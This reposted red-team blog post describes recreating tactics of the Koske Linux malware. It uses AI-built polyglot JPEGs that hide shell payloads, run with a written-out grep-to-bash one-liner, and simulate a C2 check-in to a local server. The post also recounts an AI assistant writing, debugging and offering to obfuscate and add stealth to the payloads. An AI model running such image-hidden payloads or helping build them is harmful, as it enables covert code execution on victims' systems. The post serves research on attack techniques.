National Cyber Warfare Foundation (NCWF)

The One-Man APT, Part I: A Picture That Can Execute Code on the Target


0 user ratings
2025-08-23 15:35:25
milo
Red Team (CNA)

Have you ever wondered if it’s possible to replicate the stealthy behavior of a modern cyber‑attack using artificial intelligence? As part of my research, I focused on the techniques used by a Linux-based threat known as Koske — malware that cleverly hides inside AI-generated panda images and executes a range of actions like in-memory code […]


The post The One-Man APT, Part I: A Picture That Can Execute Code on the Target first appeared on Hackers Arise.



Have you ever wondered if it’s possible to replicate the stealthy behavior of a modern cyber‑attack using artificial intelligence? As part of my research, I focused on the techniques used by a Linux-based threat known as Koske — malware that cleverly hides inside AI-generated panda images and executes a range of actions like in-memory code execution, system manipulation, and crypto mining.





I set out to reproduce some of its tactics using non-malicious components to better understand how these advanced mechanisms operate in real environments. Here’s how that exploration unfolded.









Picture source: Aquasec





This picture illustrates the attack flow of Koske, a modular Linux-based threat that uses AI-generated panda images to deliver hidden payloads. It begins with a polyglot image hosted online, which contains either C or shell code embedded within. Once executed, the payload installs components directly in memory, abuses common persistence mechanisms (like .bashrc, crontab, or custom systemd services), and deploys a rootkit using LD_PRELOAD. The final stage includes cryptominer deployment, proxy setup, and process manipulation—all designed to quietly take over the system while staying under the radar.





But for me, the idea for this project began with a simple question: Can an image also act as executable code? That led me to explore polyglot files—specifically, how a single file can be both a valid image and a shell script. The screenshot below shows the initial interaction that kicked things off. From there, I started experimenting with crafting image files that look innocent when opened normally, but could behave differently when handled by command-line tools like grep or cat. That duality became the core concept behind my simulation.









Simulating Execution from a Picture





To simulate the execution stage of the attack, I crafted a polyglot file: a valid image with a shell script hidden inside. The key was choosing a simple yet realistic way to “extract and execute” the script without requiring complex tooling. That’s where the command grep -a -A9999 “# PAYLOAD” polyglot.jpg | bash comes in.





This line mimics the behavior seen in Koske, where the payload is embedded in an image and executed directly without writing to disk. By using grep -a (to treat the file as text) and a marker like # PAYLOAD, I could isolate the script and pipe it into bash, triggering execution from inside the image—just like Koske loads and runs its shellcode in-memory after pulling down an image file from a remote server.





It’s not an exact replica, of course, but the mechanism aligns with the spirit of the attack: execution without obvious binaries, blending in with ordinary content.









Payload in Action





Once I described what I needed, the AI tool generated the polyglot image for me—already crafted and ready to execute. I didn’t have to manually append a script or build the file structure myself. The result was polyglot.jpg, a single file that looked like an ordinary image but contained a shell payload hidden inside.









As in the screenshot below, the file looks and behaves just like a regular image. It opens normally in the image viewer, and even the file command confirms it’s a valid JPEG. There’s nothing unusual on the surface. This is what makes the technique so deceptive—and so interesting to explore. The payload remains invisible unless someone knows exactly what to look for and how to extract it.









In the GIF below, you can see the moment the illusion breaks: what looks like an innocent picture suddenly launches a new terminal when processed through a simple grep command in the terminal. It’s a subtle but powerful example of how polyglot files can behave very differently depending on how they’re handled.









Taking It a Step Further





At this point, I wanted the behavior to go beyond just launching a terminal—I wanted something closer to what an APT like Koske might actually do. So I asked the AI to generate a script that could reach out to a local server, simulating a basic command-and-control (C2) check-in.






What it returned was a simple but smart piece of code that checks if curl or wget is available and then uses whichever is present to send a request to a target URL. I didn’t write any of this—the AI generated it instantly. That matters because it demonstrates how easily AI can recreate behavior we often see in real attacks: stealthy communication, adaptability to the environment, and minimal dependencies. It’s not just about hiding in a file anymore—it’s about establishing presence and reaching out, just like real malware does during the C2 phase.









Custom Payload, Fully Embedded





Once I saw that the AI could generate working scripts on the fly, I pushed the idea a little further. I asked: Can you embed this new script—complete with environment checks and a simulated C2 call—directly into a new polyglot image?





The AI did exactly that. It returned an updated image file, polyglot_custom.jpg, with the full script now baked into it. When executed, it launches a new terminal and immediately runs the embedded logic. This mimics how some real APTs operate, including Koske—using modular payloads that adapt to the system they land on and initiate contact with a remote server, often without leaving obvious traces on disk.





Again, I didn’t write a single line manually—the AI generated the code and repackaged the payload entirely on its own.









Unexpected but Relevant: Obfuscation





What really caught my attention at this stage was something I hadn’t even asked for. After generating the updated polyglot image and confirming it worked, the AI proactively suggested: “Let me know if you want to obfuscate or encode the payload further.”





This moment felt significant. Obfuscation and encoding are common techniques used in real-world malware to bypass detection, delay reverse engineering, or simply add layers of complexity. The fact that the AI offered it by default—not as an advanced feature, but as the next natural step—made the whole experiment feel eerily close to what an actual automated malware builder might behave like. And again, I didn’t request this—it simply offered it, suggesting that this logic is deeply embedded into the AI’s response pattern.









Self-Correcting Logic





After accepting the AI’s suggestion to embed a more advanced payload inside the image, I encountered a small issue during execution: the script wasn’t expanding the $URL variable correctly inside the terminal window. Instead of debugging it myself, I decided to stick with the rules of my experiment—no manual coding. So I simply showed the AI the terminal output, without any explanation.





To my surprise, it immediately identified the issue: a misuse of quotes in the heredoc block that prevented variable expansion. Then, it proposed a clean fix—rewriting the script to correctly inject the environment variable and execute it via a temporary file. This wasn’t just helpful—it demonstrated something deeper: the AI wasn’t just generating payloads, it was debugging them and evolving them based on runtime behavior.





Again, I didn’t write a line. The logic, the patch, and the delivery came entirely from the AI.













Regenerating and Retesting





Naturally, I agreed to let the AI fix the issue and regenerate the payload. Within moments, I received a new version: polyglot_fixed.jpg. This time, the script executed flawlessly—the $URL variable expanded correctly, and the C2 simulation completed as expected.





But what stood out even more was the AI’s follow-up: it offered to add stealth features or test the payload against other services. It wasn’t just patching—it was suggesting the next logical evolution of the attack, almost like an automated red team agent thinking ahead. This reinforced the idea that AI doesn’t just generate content; it iterates, adapts, and proposes improvements, mimicking the decision-making processes we usually associate with human adversaries.









Test: Success





With everything in place, I ran the final test. As shown in the GIF, executing the polyglot_fixed.jpg file using the same grep | bash technique worked exactly as expected. The script executed cleanly, reached the internal server, and displayed the response—all within a self-contained, AI-generated polyglot image.





This confirmed that the AI wasn’t just generating code, but delivering a functional, modular payload that simulates command-and-control behavior in a format designed to look entirely harmless at first glance.









Summary





The entire workflow closely mirrors the tactics, techniques, and procedures (TTPs) attributed to the Koske malware campaign.





First, Koske uses polyglot image files to deliver hidden payloads while preserving legitimate image rendering—this was replicated by embedding AI-generated shell scripts into valid JPEG files that remained viewable.





Second, Koske executes its code in memory, avoiding persistent binaries or writing to disk. This was echoed in the use of grep | bash to extract and run the payload directly from within the image.





Third, Koske exhibits environmental awareness by adapting its behavior based on the host system—similarly, the AI-generated script dynamically chose between curl and wget depending on availability. Lastly, Koske includes C2 capabilities, reaching out to predefined URLs to initiate external communication.





This was emulated through a test script contacting a local server, fully encapsulated in the image. The step-by-step logical progression in this simulation follows the operational structure of Koske almost point by point, with each phase deliberately aligned to a real-world TTP, but executed in a controlled, non-malicious environment using AI as the only development tool.





Until next time…





SmouK out!





The post The One-Man APT, Part I: A Picture That Can Execute Code on the Target first appeared on Hackers Arise.



Source: HackersArise
Source Link: https://hackers-arise.com/the-one-man-apt-part-i-a-picture-that-can-execute-code-on-the-target/


Comments
new comment
Nobody has commented yet. Will you be the first?
 
Forum
Red Team (CNA)



Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.